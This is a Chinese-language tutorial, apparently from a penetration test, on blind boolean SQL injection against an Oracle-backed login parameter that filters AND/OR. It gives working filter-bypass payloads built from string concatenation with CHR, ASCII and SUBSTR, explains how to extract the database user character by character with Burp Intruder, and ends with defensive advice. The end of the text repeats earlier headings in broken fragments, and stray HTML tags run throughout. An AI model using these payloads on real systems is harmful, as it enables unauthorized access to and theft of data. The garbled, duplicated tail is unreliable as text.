字符串拼接SQL注入实战教学文档<\/h1>

1. 漏洞背景<\/h2>
在渗透测试过程中发现一个基于Oracle数据库的布尔型SQL注入漏洞，注入点位于`account<\/code>参数处。该注入点对常规的and<\/code>和or<\/code>操作符进行了过滤，最终通过字符串拼接方法成功实现注入。<\/p>`

2. 初始测试<\/h2>

使用单引号测试：account=admin'<\/code>，发现输出与正常情况不同，确认存在注入点<\/li>
尝试常规闭合方法失败，包括：

account=admin' or '1'='1<\/code><\/li>
account=admin' and '1'='1<\/code><\/li>
双写关键字绕过（如aandnd<\/code>）<\/li>
<\/ul>
<\/li>
<\/ol>
3. 绕过思路<\/h2>
3.1 字符串拼接方法<\/h3>
发现系统使用Oracle数据库后，尝试使用Oracle的字符串连接符||<\/code>：<\/p>
account=<\/span>adm'||'<\/span>i'||'<\/span>n
<\/span><\/span><\/code><\/pre>成功闭合，系统返回与account=admin<\/code>相同的结果。<\/p>
3.2 进阶利用<\/h3>
将固定字符替换为函数调用：<\/p>
account=<\/span>adm'||CHR(105)||'<\/span>n
<\/span><\/span><\/code><\/pre>同样成功执行，其中CHR(105)<\/code>返回字母i<\/code>。<\/p>
4. 构造完整注入payload<\/h2>
采用以下形式构造注入语句：<\/p>
account=<\/span>adm'||CHR(ASCII(SUBSTR((SELECT user FROM dual),1,1))-N)||'<\/span>n
<\/span><\/span><\/code><\/pre>其中：<\/p>

SUBSTR<\/code>函数提取数据<\/li>
ASCII<\/code>函数获取字符的ASCII码<\/li>
通过调整N<\/code>值使得CHR<\/code>参数等于105（字母i<\/code>的ASCII码）<\/li>
当CHR<\/code>参数等于105时，整个表达式等价于admin<\/code><\/li>
<\/ul>
5. 自动化利用<\/h2>
使用Burp Suite Intruder模块爆破用户名的第一个字符：<\/p>

设置payload位置在N<\/code>值处<\/li>
通过观察响应是否与account=admin<\/code>相同来判断是否正确字符<\/li>
成功爆破出第一位字符后，可编写脚本自动化获取完整数据<\/li>
<\/ol>
6. Oracle相关函数说明<\/h2>

CHR(n)<\/code>: 返回ASCII码为n的字符<\/li>
ASCII(c)<\/code>: 返回字符c的ASCII码<\/li>
SUBSTR(str,pos,len)<\/code>: 从字符串str的第pos位开始截取len个字符<\/li>
dual<\/code>: Oracle的系统表，常用于测试查询<\/li>
<\/ul>
7. 防御建议<\/h2>

使用参数化查询或预编译语句<\/li>
实施最小权限原则<\/li>
对输入进行严格过滤和转义<\/li>
禁用错误信息回显<\/li>
使用Web应用防火墙(WAF)<\/li>
<\/ol>
8. 总结<\/h2>
该案例展示了当常规SQL注入方法被过滤时，如何利用字符串拼接技术实现注入。关键在于：<\/p>

识别数据库类型（本例为Oracle）<\/li>
了解特定数据库的字符串操作函数<\/li>
构造确保语法正确的payload<\/li>
通过布尔型判断逐步获取数据<\/li>
<\/ol>
这种方法在Oracle环境下特别有效，但原理可应用于其他支持字符串拼接的数据库系统。<\/p>

字符串拼接SQL注入实战教学文档<\/h1>

1. 漏洞背景<\/h2> 在渗透测试过程中发现一个基于Oracle数据库的布尔型SQL注入漏洞，注入点位于account<\/code>参数处。该注入点对常规的and<\/code>和or<\/code>操作符进行了过滤，最终通过字符串拼接方法成功实现注入。<\/p>

3. 绕过思路<\/h2>

1. 漏洞背景<\/h2>
在渗透测试过程中发现一个基于Oracle数据库的布尔型SQL注入漏洞，注入点位于`account<\/code>参数处。该注入点对常规的and<\/code>和or<\/code>操作符进行了过滤，最终通过字符串拼接方法成功实现注入。<\/p>`